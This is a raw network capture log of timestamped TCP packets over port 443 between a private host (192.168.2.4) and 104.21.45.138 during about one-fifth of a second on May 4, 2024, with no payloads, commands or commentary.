May 4, 2024 09:48:40.834192991 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.834214926 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.836895943 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.836916924 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.836965084 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.836987019 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.837006092 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.837028027 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.839601040 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.839616060 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.839689970 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.839720011 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.842132092 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.842153072 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.842189074 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.842204094 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.842222929 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.842250109 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.845159054 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.845177889 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.845232010 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.845247030 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.847243071 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.847577095 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.847592115 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.847672939 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.847685099 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.850142002 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.850162029 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.850198984 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.850212097 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.850233078 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.850260973 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.853241920 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.853276968 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.853313923 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.853339911 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.853354931 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.853379011 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.855457067 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.855473042 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.855535030 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.855551958 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.856749058 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.857948065 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.857964993 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.858021021 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.858036995 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.858099937 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.860378981 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.860395908 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.860483885 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.860505104 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.863265991 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.864737034 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.864761114 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.864820957 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.864837885 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.865823984 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.865843058 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.865886927 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.865902901 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.865927935 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.865952969 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.868386030 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.868405104 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.868472099 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.868503094 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.870347023 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.870366096 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.870421886 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.870444059 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.871237040 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.872807026 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.872822046 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.872894049 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.872911930 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.875231028 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.875252008 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.875308990 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.875322104 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.875338078 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.875365973 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.877687931 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.877703905 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.877768993 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.877790928 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.879281998 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.880628109 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.880645037 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.880717039 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.880742073 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.883074999 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.883095026 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.883168936 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.883193016 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.883330107 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.885423899 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.885437965 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.885504007 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.885524035 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.887185097 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.887916088 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.887931108 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.887999058 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.888015985 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.890969992 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.890996933 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.891036987 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.891062975 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.891079903 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.892762899 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.893384933 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.893423080 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.893454075 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.893472910 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.893486977 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.895478964 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.895847082 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.895864010 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.895905972 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.895922899 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.895940065 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.895960093 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.898222923 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.898241043 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.898291111 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.898310900 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.898325920 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.898348093 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.901417017 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.901433945 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.901515961 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.901535988 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.903583050 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.903604031 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.903620005 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.903629065 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.903669119 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.903692007 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.906034946 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.906055927 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.906116962 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.906131029 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.908535004 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.908591986 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.908610106 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.908622026 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.908634901 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.908668041 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.911715984 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.911761999 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.912045002 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.912060976 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.914491892 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.914526939 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.927233934 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.927256107 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.927339077 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.927359104 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.929069042 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.929090977 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.929136038 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.929150105 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.929174900 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.929199934 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.931157112 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.931210995 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.931240082 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.931248903 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.931260109 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.931291103 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.932939053 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.932955980 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.933010101 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.933022976 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.935276985 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.935297966 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.935358047 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.935368061 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.937175035 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.937223911 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.937238932 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.937295914 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.937304020 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.939204931 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.939224958 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.939260960 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.939271927 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.939301014 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.939323902 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.941149950 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.941167116 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.941221952 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.941235065 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.943450928 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.943470001 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.943516016 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.943542004 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.943553925 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.944230080 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.945565939 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.945580959 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.945648909 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.945661068 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.947274923 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.947293997 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.947346926 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.947357893 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.948035002 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.950143099 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.950160027 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.950207949 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.950220108 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.950232983 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.950258970 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.952088118 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.952107906 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.952240944 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.952255011 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.953197956 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.953478098 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.953491926 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.953540087 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.953550100 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.953574896 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.953598976 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.955411911 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.955426931 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.955507040 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.955519915 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.956161976 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.958239079 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.958254099 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.958303928 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.958316088 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.958337069 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.958348036 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.960253000 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.960273981 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.960305929 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.960315943 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.960336924 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.960355997 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.962088108 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.962115049 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.962142944 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.962155104 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.962179899 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.962193966 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.963515043 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.963529110 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.963588953 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.963601112 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.966125011 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.966381073 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.966398954 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.966430902 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.966444969 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.966475010 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.966495037 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.968208075 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.968223095 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.968266964 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.968280077 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.968293905 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.968317986 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.970146894 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.970163107 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.970197916 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.970210075 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.970223904 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.970247030 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.972117901 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.972134113 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.972178936 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.972193956 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.973170042 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.974459887 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.974476099 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.974520922 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.974535942 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.975222111 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.976349115 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.976377010 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.976403952 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.976418018 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.976438046 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.976489067 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.978214025 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.978228092 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.978275061 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.978290081 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.980170965 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.980189085 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.980221987 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.980236053 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.980248928 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.980272055 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.982093096 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.982108116 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.982151031 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.982173920 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.982186079 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.983242989 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.984476089 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.984491110 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.984546900 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.984560013 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.986421108 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.986438990 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.986465931 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.986479998 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.986496925 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.986515999 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.988286018 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.988301039 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.988338947 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.988352060 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.988367081 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.990225077 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.990245104 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.990276098 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.990292072 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.990314960 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.990334034 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.992094994 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.992120028 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.992155075 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.992166996 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.992180109 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.994479895 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.994498968 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.994528055 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.994544029 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.994556904 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.994576931 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.996325016 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.996362925 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.996396065 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.996407986 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.996418953 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.996444941 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.998256922 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.998271942 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.998316050 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.998327971 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:41.001029015 CEST	443	49737	104.21.45.138	192.168.2.4
